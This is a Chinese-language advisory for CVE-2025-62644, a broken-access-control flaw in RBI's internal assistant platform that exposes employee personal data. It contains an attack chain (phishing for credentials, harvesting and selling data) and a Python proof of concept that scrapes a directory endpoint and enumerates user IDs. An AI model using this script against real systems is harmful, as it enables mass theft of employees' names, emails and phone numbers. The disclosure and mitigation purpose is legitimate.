CVE-2025-62644：RBI助手平台全局门店目录信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-62644

漏洞类型

信息泄露/访问控制缺陷

CVSS评分

5.0 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Restaurant Brands International (RBI) Assistant Platform

漏洞概述

CVE-2025-62644是存在于Restaurant Brands International（RBI，旗下拥有汉堡王、Tim Hortons、Popeyes等知名快餐品牌）助手平台中的一个信息泄露漏洞。根据披露信息，该平台截至2025年9月6日，其"全局门店目录"（Global Store Directory）功能存在严重的访问控制缺陷，允许任何经过身份验证的用户查看和访问其他认证用户的个人信息。RBI助手平台是一个面向内部员工的管理工具，用于管理旗下各品牌在全球范围内的门店运营。该平台的全局门店目录功能本应仅显示门店的基本运营信息（如地址、联系方式、营业时间等），但实际上该目录中包含了员工的个人敏感信息，如姓名、联系方式、职位等。由于平台未对用户间的信息访问实施适当的权限隔离和访问控制，低权限认证用户可以浏览和收集其他用户的个人数据，导致大规模的用户隐私泄露。该漏洞的CVSS评分为5.0，虽然评分等级为中等，但由于影响范围涉及RBI全球门店网络的大量员工，其实际危害程度不容忽视。安全研究员bobdahacker在其博客中披露了这一漏洞，并指出RBI平台存在多个"灾难性"安全漏洞，引起了安全社区和媒体的广泛关注。

技术细节

该漏洞的核心问题在于RBI助手平台的全局门店目录功能缺乏适当的访问控制机制（Broken Access Control）。从技术层面分析，漏洞原理如下：

1. **权限模型缺陷**：平台的身份验证系统仅验证用户是否为合法登录用户，但未对不同用户之间的数据访问权限进行细粒度控制。全局门店目录功能被设计为对所有认证用户开放，没有实现基于角色的访问控制（RBAC）或属性基访问控制（ABAC）。

2. **数据暴露面**：全局门店目录API端点在返回门店关联信息时，未对敏感字段（如员工个人信息）进行过滤或脱敏处理。客户端可以通过常规的API调用获取完整的用户信息数据集。

3. **横向越权访问**：由于缺乏对象级访问控制（IDOR/BOLA），任何已认证用户可以通过遍历用户ID或利用目录浏览功能，访问系统中其他用户的个人资料信息，包括姓名、电子邮件地址、电话号码、职位等PII数据。

4. **影响范围**：根据CVSS向量中的"S:C"（范围变更）标识，该漏洞的影响超出了RBI助手平台本身，可能影响与之集成的其他系统或服务。

利用方式相对简单：攻击者只需拥有平台的有效登录凭证（低权限账户即可），登录后访问全局门店目录功能，即可查看和收集其他用户的个人信息。无需特殊的技术工具或复杂的攻击链，普通用户即可执行此操作。

攻击链分析

STEP 1

步骤1：获取凭证

攻击者通过钓鱼、社会工程或其他方式获取RBI助手平台的任意有效低权限用户账号凭证。

STEP 2

步骤2：登录平台

使用获取的凭证登录RBI助手平台，通过正常身份验证流程进入系统。

STEP 3

步骤3：访问全局门店目录

登录后导航至全局门店目录（Global Store Directory）功能页面，该功能对所有认证用户开放。

STEP 4

步骤4：枚举用户信息

通过目录浏览或API调用，查看其他门店关联的员工个人信息，包括姓名、邮箱、电话、职位等敏感数据。

STEP 5

步骤5：数据收集与利用

批量收集系统内所有用户的个人信息，用于后续的钓鱼攻击、身份盗用或出售给第三方。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62644 PoC - RBI Assistant Platform Information Disclosure
# Vulnerability: Global Store Directory exposes personal information to all authenticated users
# Author: Security Researcher

import requests

# Configuration
BASE_URL = "https://[RBI-assistant-platform-domain]"
SESSION_COOKIE = "authenticated_session_cookie_here"

# Step 1: Authenticate to the RBI assistant platform
# (Requires valid low-privilege user credentials)
auth_headers = {
    "Cookie": f"session={SESSION_COOKIE}",
    "Content-Type": "application/json"
}

# Step 2: Access the Global Store Directory endpoint
# This endpoint returns store information along with associated
# employee personal information without proper access control
directory_url = f"{BASE_URL}/api/global-store-directory"

response = requests.get(directory_url, headers=auth_headers)

if response.status_code == 200:
    data = response.json()
    
    # Step 3: Extract personal information of all users
    # The vulnerability allows any authenticated user to view
    # PII data of other users through the directory
    for store in data.get("stores", []):
        for employee in store.get("employees", []):
            print(f"Name: {employee.get('name')}")
            print(f"Email: {employee.get('email')}")
            print(f"Phone: {employee.get('phone')}")
            print(f"Position: {employee.get('position')}")
            print(f"Store: {store.get('name')}")
            print("---")
else:
    print(f"Access failed: {response.status_code}")
    # Step 4: Alternative - iterate through user IDs to enumerate
    for user_id in range(1, 10000):
        user_url = f"{BASE_URL}/api/users/{user_id}"
        user_response = requests.get(user_url, headers=auth_headers)
        if user_response.status_code == 200:
            user_data = user_response.json()
            print(f"User {user_id}: {user_data}")

影响范围

RBI Assistant Platform <= 2025-09-06

防御指南

临时缓解措施

在官方修复补丁发布之前，建议采取以下临时缓解措施：1）审查并限制全局门店目录功能的访问权限，仅向必要的管理人员开放；2）监控异常的API调用和数据访问行为，设置访问频率告警；3）对目录中展示的员工个人信息进行脱敏处理，隐藏敏感字段如电话号码、邮箱地址等；4）强制所有用户重置密码和会话令牌，撤销可能已泄露的凭证；5）部署Web应用防火墙（WAF）规则，检测和阻止异常的批量数据枚举请求。